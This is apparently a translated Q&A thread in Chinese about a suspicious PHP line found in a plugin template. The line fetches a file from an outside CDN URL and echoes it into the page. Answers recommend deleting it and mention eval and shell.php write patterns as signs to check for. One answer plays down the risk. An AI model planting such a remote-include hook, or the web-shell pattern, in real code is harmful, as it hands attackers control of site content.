我刚刚发现这个嵌入在我正在使用的插件中(在html之前的tmpl文件的开头)...
我应该担心吗? 我可以删除吗?<?php
$author = @file_get_contents('http://d5827db8276672d15fca-1e2d3239e5a8580a4f85f7906852eb87.r51.cf1.rackcdn.com/author3c.php');
echo $author;
?>
由于
答案 0 :(得分:2)
我刚刚访问了这个网址,它只是一个空的php文件,所以除非某处说它必须保留,我会将其删除。
EDIT ::
当我说它是一个空的php文件时,它实际上弹出了一个下载对话框来下载文件,它不只是为我提供空页。
答案 1 :(得分:1)
我删除它,如果您无法控制该文件中的内容,那么您将面临安全风险,无论模板的作者说什么。
检查代码的其余部分是否为eval($author)
或file_put_contents('shell.php',$author);
等
答案 2 :(得分:0)
file_get_contents
只需将文件的所有内容加载到变量中,不执行代码。
我建议您首先检查该文件中是否没有关键标签或代码,然后您可以安全地将其删除。
有关详细信息,请参阅PHP.net上的此页面:file_get_contents manual。